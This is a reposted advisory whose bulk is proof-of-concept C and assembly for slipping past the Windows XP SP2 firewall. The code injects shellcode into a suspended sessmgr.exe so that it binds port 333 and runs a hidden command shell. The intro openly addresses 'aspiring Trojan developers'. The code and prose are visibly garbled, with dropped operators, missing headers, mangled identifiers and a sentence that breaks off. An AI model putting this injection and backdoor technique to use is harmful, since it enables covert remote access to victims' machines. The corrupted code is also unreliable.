[Repost] Code to bypass the XP SP2 firewall


Bypassing XP SP2 Firewall Code Summary

Windows XP Service Pack 2 incorporates many enhancements that try to better protect systems from malware and other forms of attack. One of those layers of protection is the Windows XP SP2 Firewall. One of the features of this firewall is the ability to let users decide which applications can listen on the network. By allowing users to control which applications can communicate on the network, Microsoft believes that systems will be protected against threats such as Trojans. Like so many things Microsoft says, this is inaccurate, and in fact it is very easy for locally executing code to bypass the Windows Firewall. So don't worry, you aspiring Trojan developers: you're still going to be able to Trojan consumer and corporate systems to your heart's content.

Attached to this advisory is proof-of-concept code that demonstrates how a Trojan could bind to a port and accept connections by piggybacking on the inherent trust of sessmgr.exe. Simply compile this program and run it as any local user. To test whether the firewall has been bypassed (it is!), telnet from another machine to the target machine on port 333, and if your connection

Details Exploit: #include #include #include #include #include

Void SetFP (CHAR * BUFFER, INT SZ, DWORD FROM, DWORD FP) {INT i; for (i = 0; i

int injcode (char * buffer) {HMODULE ws2_32; DWORD _loadlibrarya, _createprocessa, _wsastartup, _wsasocketa, _bind, _listen, _accept, _sleep; char * code; int len; ws2_32 = LoadLibrary ( "ws2_32"); _ loadlibrarya = (DWORD) GetProcAddress (GetModuleHandle ( "kernel32"), "LoadLibraryA"); _ createprocessa = (DWORD) GetProcAddress (GetModuleHandle ( "kernel32"), "CreateProcessA"); _ sleep = (DWORD) GetProcAddress (GetModuleHandle ( "kernel32"), "Sleep") ; _wsastartup = (DWORD) GetProcAddress (ws2_32, "WSAStartup"); _ wsasocketa = (DWORD) GetProcAddress (ws2_32, "WSASocketA"); _ bind = (DWORD) GetProcAddress (ws2_32, "bind"); _ listen = (DWORD) GetProcAddress ( WS2_32, "listen"); _ accept = (dword) getProcaddress (WS2_32, "accept"); __ asm {call over

Push '23'push' _2sw'push Espmov Eax, 0x11111111Call EAX

XOR EBX, EBXPUSH 0X64POP EBXWSADATA: PUSH EBXLOOP WSADATAPUSH ESPUSH 0X101MOV EAX, 0X33333333Call EAX

Push EBXPUSH EBXPUSH EBXPUSH EBXPUSH SOCK_STREAMPUSH AF_INETMOV EAX, 0x44444444Call ESIV ESI, ESI

Push ebxpush ebxpush ebxpush 0x4d010002 / * port 333 * / MOV EAX, ESPPUSH 0x10push Eaxpush Esimov Eax, 0x5555555Call EAX

Push SomaxConnpush Esimov Eax, 0x6666666Call EAX

Push Ebxpush Ebxpush Esimov Eax, 0x77777777Call Eaxmov Edi, EAX

push ebxpush ebxpush ebxpush ebxmov eax, esppush edipush edipush edipush ebxpush SW_HIDEpush STARTF_USESTDHANDLESpush 0xApop ecxstartupinfo: push ebxloop startupinfopush 0x44mov ecx, esppush 'dmc'mov edx, esp

Push Eaxpush ECXPUSH EBXPUSH EBXPUSH EBXPUSH 1PUSH EBXPUSH EBXPUSH EDXPUSH EBXMOV EAX, 0X22222222CALL EAX

Push Infinitemov Eax, 0x8888888Call EAX

OVER: POP Eaxmov Code, EAX}

len = 0xA0; memcpy (buffer, code, len); setfp (buffer, len, 0x11111111, _loadlibrarya); setfp (buffer, len, 0x22222222, _createprocessa); setfp (buffer, len, 0x33333333, _wsastartup); setfp (buffer, len, 0x44444444, _wsasocketa); setfp (buffer, len, 0x55555555, _bind); setfp (buffer, len, 0x66666666, _listen); setfp (buffer, len, 0x77777777, _accept); setfp (buffer, len, 0x88888888, _sleep) Return Len;}

void main (void) {STARTUPINFO sinfo; PROCESS_INFORMATION pinfo; CONTEXT context; LDT_ENTRY sel; DWORD read, tib, peb, exebase, peoffs, ep; IMAGE_NT_HEADERS pehdr; int len; char sessmgr [MAX_PATH 13]; char buffer [2048] ;

GetSystemDirectory; sessmgr [max_path] = 0; strcat (sessmgr, "// sessmgr.exe"); MEMSET (& SINFO, 0, SIZEOF (SINFO)); sinfo.cb = sizeof (sinfo);

IF (! CreateProcess (sessmgr, null, null, null, false, create_suspended, null, null, & sinfo, & pinfo) Printf ("CreateProcess Failed"), exit (1);

context.ContextFlags = CONTEXT_FULL; GetThreadContext (pinfo.hThread, & context); GetThreadSelectorEntry (pinfo.hThread, context.SegFs, & sel); tib = sel.BaseLow | (sel.HighWord.Bytes.BaseMid << 16) | (sel. HighWord.Bytes.BaseHi << 24); ReadProcessMemory (pinfo.hProcess, (LPCVOID) (tib 0x30), & peb, 4, & read); ReadProcessMemory (pinfo.hProcess, (LPCVOID) (peb 0x08), & exebase, 4 , & read);

ReadProcessMemory (pinfo.hProcess, (LPCVOID) (exebase 0x3C), & peoffs, 4, & read); ReadProcessMemory (pinfo.hProcess, (LPCVOID) (exebase peoffs), & pehdr, sizeof (pehdr), & read); ep = exebase pehdr.optionalheader.addressofentrypoint;

Len = Injcode (buffer); VirtualProtect ((LPVOID) EP, LEN, PAGE_EXECUTE_READWRITE, & Read); WriteProcessMemory (Pinfo.hprocess, (LPVOID) EP, Buffer, Len, & Read;

ResMethread (Pinfo.hthread);

